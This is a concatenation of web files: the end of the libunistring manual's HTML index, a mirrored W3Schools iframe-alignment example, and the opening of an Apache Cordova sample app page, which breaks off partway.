<tr><td></td><td valign="top"><a href="libunistring_8.html#IDX614"><code>uc_is_property_join_control</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX660"><code>uc_is_property_left_of_pair</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX651"><code>uc_is_property_line_separator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX589"><code>uc_is_property_logical_order_exception</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX595"><code>uc_is_property_lowercase</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX657"><code>uc_is_property_math</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX645"><code>uc_is_property_non_break</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX585"><code>uc_is_property_not_a_character</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX664"><code>uc_is_property_numeric</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX584"><code>uc_is_property_other_alphabetic</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX587"><code>uc_is_property_other_default_ignorable_code_point</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX617"><code>uc_is_property_other_grapheme_extend</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX609"><code>uc_is_property_other_id_continue</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX607"><code>uc_is_property_other_id_start</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX596"><code>uc_is_property_other_lowercase</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX658"><code>uc_is_property_other_math</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX594"><code>uc_is_property_other_uppercase</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX659"><code>uc_is_property_paired_punctuation</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX652"><code>uc_is_property_paragraph_separator</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX613"><code>uc_is_property_pattern_syntax</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX612"><code>uc_is_property_pattern_white_space</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX591"><code>uc_is_property_private_use</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX650"><code>uc_is_property_punctuation</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX653"><code>uc_is_property_quotation_mark</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX640"><code>uc_is_property_radical</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX654"><code>uc_is_property_sentence_terminal</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX605"><code>uc_is_property_soft_dotted</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX644"><code>uc_is_property_space</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX655"><code>uc_is_property_terminal_punctuation</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX597"><code>uc_is_property_titlecase</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX592"><code>uc_is_property_unassigned_code_value</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX639"><code>uc_is_property_unified_ideograph</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX593"><code>uc_is_property_uppercase</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX590"><code>uc_is_property_variation_selector</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX582"><code>uc_is_property_white_space</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX611"><code>uc_is_property_xid_continue</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX610"><code>uc_is_property_xid_start</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX643"><code>uc_is_property_zero_width</code></a></td><td valign="top"><a href="libunistring_8.html#SEC35">8.9.2 Properties as functions &ndash; the functional API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX696"><code>uc_is_punct</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX672"><code>uc_is_script</code></a></td><td valign="top"><a href="libunistring_8.html#SEC36">8.10 Scripts</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX697"><code>uc_is_space</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX698"><code>uc_is_upper</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX699"><code>uc_is_xdigit</code></a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX688"><code>uc_java_ident_category</code></a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX491"><code>uc_joining_group</code></a></td><td valign="top"><a href="libunistring_8.html#SEC32">8.8.2 Joining group of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX490"><code>uc_joining_group_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC32">8.8.2 Joining group of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX489"><code>uc_joining_group_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC32">8.8.2 Joining group of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX431"><code>uc_joining_type</code></a></td><td valign="top"><a href="libunistring_8.html#SEC31">8.8.1 Joining type of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX430"><code>uc_joining_type_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC31">8.8.1 Joining type of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX429"><code>uc_joining_type_long_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC31">8.8.1 Joining type of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX428"><code>uc_joining_type_name</code></a></td><td valign="top"><a href="libunistring_8.html#SEC31">8.8.1 Joining type of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX819"><code>uc_locale_language</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX421"><code>uc_mirror_char</code></a></td><td valign="top"><a href="libunistring_8.html#SEC29">8.7 Mirrored character</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX420"><code>uc_numeric_value</code></a></td><td valign="top"><a href="libunistring_8.html#SEC28">8.6 Numeric value</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX579"><code>uc_property_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC34">8.9.1 Properties as objects &ndash; the object oriented API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX580"><code>uc_property_is_valid</code></a></td><td valign="top"><a href="libunistring_8.html#SEC34">8.9.1 Properties as objects &ndash; the object oriented API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX492"><code>uc_property_t</code></a></td><td valign="top"><a href="libunistring_8.html#SEC34">8.9.1 Properties as objects &ndash; the object oriented API</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX670"><code>uc_script</code></a></td><td valign="top"><a href="libunistring_8.html#SEC36">8.10 Scripts</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX671"><code>uc_script_byname</code></a></td><td valign="top"><a href="libunistring_8.html#SEC36">8.10 Scripts</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX668"><code>uc_script_t</code></a></td><td valign="top"><a href="libunistring_8.html#SEC36">8.10 Scripts</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX816"><code>uc_tolower</code></a></td><td valign="top"><a href="libunistring_14.html#SEC55">14.1 Case mappings of characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX817"><code>uc_totitle</code></a></td><td valign="top"><a href="libunistring_14.html#SEC55">14.1 Case mappings of characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX815"><code>uc_toupper</code></a></td><td valign="top"><a href="libunistring_14.html#SEC55">14.1 Case mappings of characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX705"><code>uc_width</code></a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_11.html#IDX753"><code>uc_wordbreak_property</code></a></td><td valign="top"><a href="libunistring_11.html#SEC46">11.2 Word break property</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX6">UCS-4</a></td><td valign="top"><a href="libunistring_1.html#SEC2">1.1 Unicode</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_3.html#IDX19"><code>ucs4_t</code></a></td><td valign="top"><a href="libunistring_3.html#SEC10">3. Elementary types <code>&lt;unitypes.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_3.html#IDX17"><code>uint16_t</code></a></td><td valign="top"><a href="libunistring_3.html#SEC10">3. Elementary types <code>&lt;unitypes.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_3.html#IDX18"><code>uint32_t</code></a></td><td valign="top"><a href="libunistring_3.html#SEC10">3. Elementary types <code>&lt;unitypes.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_3.html#IDX16"><code>uint8_t</code></a></td><td valign="top"><a href="libunistring_3.html#SEC10">3. Elementary types <code>&lt;unitypes.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX182"><code>ulc_asnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX181"><code>ulc_asprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX863"><code>ulc_casecmp</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX875"><code>ulc_casecoll</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX871"><code>ulc_casexfrm</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX235"><code>ulc_fprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX721"><code>ulc_grapheme_breaks</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX762"><code>ulc_possible_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX180"><code>ulc_snprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX179"><code>ulc_sprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX186"><code>ulc_vasnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX185"><code>ulc_vasprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX236"><code>ulc_vfprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX184"><code>ulc_vsnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX183"><code>ulc_vsprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX766"><code>ulc_width_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_11.html#IDX739"><code>ulc_wordbreaks</code></a></td><td valign="top"><a href="libunistring_11.html#SEC45">11.1 Word breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#SEC2">Unicode</a></td><td valign="top"><a href="libunistring_1.html#SEC2">1.1 Unicode</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC25">Unicode character, bidi class</a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC25">Unicode character, bidirectional category</a></td><td valign="top"><a href="libunistring_8.html#SEC25">8.3 Bidi class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX675">Unicode character, block</a></td><td valign="top"><a href="libunistring_8.html#SEC37">8.11 Blocks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC24">Unicode character, canonical combining class</a></td><td valign="top"><a href="libunistring_8.html#SEC24">8.2 Canonical combining class</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC55">Unicode character, case mappings</a></td><td valign="top"><a href="libunistring_14.html#SEC55">14.1 Case mappings of characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC21">Unicode character, classification</a></td><td valign="top"><a href="libunistring_8.html#SEC21">8.1 General category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC39">Unicode character, classification like in C</a></td><td valign="top"><a href="libunistring_8.html#SEC39">8.13 Classifications like in ISO C</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC21">Unicode character, general category</a></td><td valign="top"><a href="libunistring_8.html#SEC21">8.1 General category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC29">Unicode character, mirroring</a></td><td valign="top"><a href="libunistring_8.html#SEC29">8.7 Mirrored character</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_7.html#SEC19">Unicode character, name</a></td><td valign="top"><a href="libunistring_7.html#SEC19">7. Names of Unicode characters <code>&lt;uniname.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC33">Unicode character, properties</a></td><td valign="top"><a href="libunistring_8.html#SEC33">8.9 Properties</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX669">Unicode character, script</a></td><td valign="top"><a href="libunistring_8.html#SEC36">8.10 Scripts</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX685">Unicode character, validity in C identifiers</a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#IDX687">Unicode character, validity in Java identifiers</a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC26">Unicode character, value</a></td><td valign="top"><a href="libunistring_8.html#SEC26">8.4 Decimal digit value</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC27">Unicode character, value</a></td><td valign="top"><a href="libunistring_8.html#SEC27">8.5 Digit value</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC28">Unicode character, value</a></td><td valign="top"><a href="libunistring_8.html#SEC28">8.6 Numeric value</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX702">Unicode character, width</a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_7.html#IDX238"><code>unicode_character_name</code></a></td><td valign="top"><a href="libunistring_7.html#SEC19">7. Names of Unicode characters <code>&lt;uniname.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_7.html#IDX239"><code>unicode_name_character</code></a></td><td valign="top"><a href="libunistring_7.html#SEC19">7. Names of Unicode characters <code>&lt;uniname.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX795"><code>uninorm_decomposing_form</code></a></td><td valign="top"><a href="libunistring_13.html#SEC51">13.3 Normalization of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX811"><code>uninorm_filter_create</code></a></td><td valign="top"><a href="libunistring_13.html#SEC53">13.5 Normalization of streams of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX813"><code>uninorm_filter_flush</code></a></td><td valign="top"><a href="libunistring_13.html#SEC53">13.5 Normalization of streams of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX814"><code>uninorm_filter_free</code></a></td><td valign="top"><a href="libunistring_13.html#SEC53">13.5 Normalization of streams of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX812"><code>uninorm_filter_write</code></a></td><td valign="top"><a href="libunistring_13.html#SEC53">13.5 Normalization of streams of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX793"><code>uninorm_is_compat_decomposing</code></a></td><td valign="top"><a href="libunistring_13.html#SEC51">13.3 Normalization of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX794"><code>uninorm_is_composing</code></a></td><td valign="top"><a href="libunistring_13.html#SEC51">13.3 Normalization of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX788"><code>uninorm_t</code></a></td><td valign="top"><a href="libunistring_13.html#SEC51">13.3 Normalization of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC56">uppercasing</a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX1">use cases</a></td><td valign="top"><a href="libunistring_1.html#SEC1">1. Introduction</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX4">UTF-16</a></td><td valign="top"><a href="libunistring_1.html#SEC2">1.1 Unicode</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX12">UTF-16, strings</a></td><td valign="top"><a href="libunistring_1.html#SEC8">1.7 Unicode strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX5">UTF-32</a></td><td valign="top"><a href="libunistring_1.html#SEC2">1.1 Unicode</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX13">UTF-32, strings</a></td><td valign="top"><a href="libunistring_1.html#SEC8">1.7 Unicode strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX3">UTF-8</a></td><td valign="top"><a href="libunistring_1.html#SEC2">1.1 Unicode</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX11">UTF-8, strings</a></td><td valign="top"><a href="libunistring_1.html#SEC8">1.7 Unicode strings</a></td></tr> <tr><td colspan="3"> <hr></td></tr> </table> <table><tr><th valign="top">Jump to: &nbsp; </th><td><a href="#SEC77_0" class="summary-letter"><b>A</b></a> &nbsp; <a href="#SEC77_1" class="summary-letter"><b>B</b></a> &nbsp; <a href="#SEC77_2" class="summary-letter"><b>C</b></a> &nbsp; <a href="#SEC77_3" class="summary-letter"><b>D</b></a> &nbsp; <a href="#SEC77_4" class="summary-letter"><b>E</b></a> &nbsp; <a href="#SEC77_5" class="summary-letter"><b>F</b></a> &nbsp; <a href="#SEC77_6" class="summary-letter"><b>G</b></a> &nbsp; <a href="#SEC77_7" class="summary-letter"><b>H</b></a> &nbsp; <a href="#SEC77_8" class="summary-letter"><b>I</b></a> &nbsp; <a href="#SEC77_9" class="summary-letter"><b>J</b></a> &nbsp; <a href="#SEC77_10" class="summary-letter"><b>L</b></a> &nbsp; <a href="#SEC77_11" class="summary-letter"><b>M</b></a> &nbsp; <a href="#SEC77_12" class="summary-letter"><b>N</b></a> &nbsp; <a href="#SEC77_13" class="summary-letter"><b>O</b></a> &nbsp; <a href="#SEC77_14" class="summary-letter"><b>P</b></a> &nbsp; <a href="#SEC77_15" class="summary-letter"><b>R</b></a> &nbsp; <a href="#SEC77_16" class="summary-letter"><b>S</b></a> &nbsp; <a href="#SEC77_17" class="summary-letter"><b>T</b></a> &nbsp; <a href="#SEC77_18" class="summary-letter"><b>U</b></a> &nbsp; <a href="libunistring_20.html#INDEX0_0" class="summary-letter"><b>V</b></a> &nbsp; <a href="libunistring_20.html#INDEX0_1" class="summary-letter"><b>W</b></a> &nbsp; </td></tr></table> <hr size="6"> <table cellpadding="1" cellspacing="1" border="0"> <tr><td valign="middle" align="left">[<a href="libunistring_18.html#SEC68" title="Beginning of this chapter or previous chapter"> &lt;&lt; </a>]</td> <td valign="middle" align="left">[<a href="libunistring_20.html#INDEX0" title="Next chapter"> &gt;&gt; </a>]</td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left"> &nbsp; </td> <td valign="middle" align="left">[<a href="libunistring.html#SEC_Top" title="Cover (top) of document">Top</a>]</td> <td valign="middle" align="left">[<a href="libunistring.html#SEC_Contents" title="Table of contents">Contents</a>]</td> <td valign="middle" align="left">[<a href="#SEC77" title="Index">Index</a>]</td> <td valign="middle" align="left">[<a href="libunistring_abt.html#SEC_About" title="About (help)"> ? </a>]</td> </tr></table> <p> <font size="-1"> This document was generated by <em>Daiki Ueno</em> on <em>September, 1 2014</em> using <a href="http://www.nongnu.org/texi2html/"><em>texi2html 1.78a</em></a>. </font> <br> </p> </body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/tags/tryhtml_iframe_align_css.html
platinhom/ManualHom
<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/tags/tryhtml_iframe_align_css.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:14 GMT --> <body> <p>This is some text. This is some text. This is some text. <iframe src="../default.html" width="200" height="200" style="float:right"> <p>Your browser does not support iframes.</p> </iframe> This is some text. This is some text. This is some text.</p> </body> <!-- Mirrored from www.w3schools.com/tags/tryhtml_iframe_align_css.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:14 GMT --> </html>
www/globalization.html
pxai/cordova-core-api
<!DOCTYPE html> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <html> <head> <!-- Customize this policy to fit your own app's needs. For more guidance, see: https://github.com/apache/cordova-plugin-whitelist/blob/master/README.md#content-security-policy Some notes: * gap: is required only on iOS (when using UIWebView) and is needed for JS->native communication * https://ssl.gstatic.com is required only on Android and is needed for TalkBack to function properly * Disables use of inline scripts in order to mitigate risk of XSS vulnerabilities. To change this: * Enable inline JS: add 'unsafe-inline' to default-src --> <meta http-equiv="Content-Security-Policy" content="default-src 'self' data: gap: https://ssl.gstatic.com 'unsafe-eval'; style-src 'self' 'unsafe-inline'; media-src *"> <meta name="format-detection" content="telephone=no"> <meta name="msapplication-tap-highlight" content="no"> <meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1, minimum-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="css/index.css"> <title>Apache Cordova API</title> </head> <body> <div class="app"> <h1>Apache Cordova API</h1> <div id="deviceready" class="blink"> <p class="event listening">Connecting to Device</p> <p class="event received">Ready</p> <a href="dialogs.html" class="btn">Dialogs sample</a> <a href="batteries.html" class="btn">Battery sample</a> <a href="camera.html" class="btn">Camera sample</a> <a href="console.html" class="btn">Console sample</a> <a href="device.html" class="btn">Device sample</a> <a href="deviceMotion.html" class="btn">Device 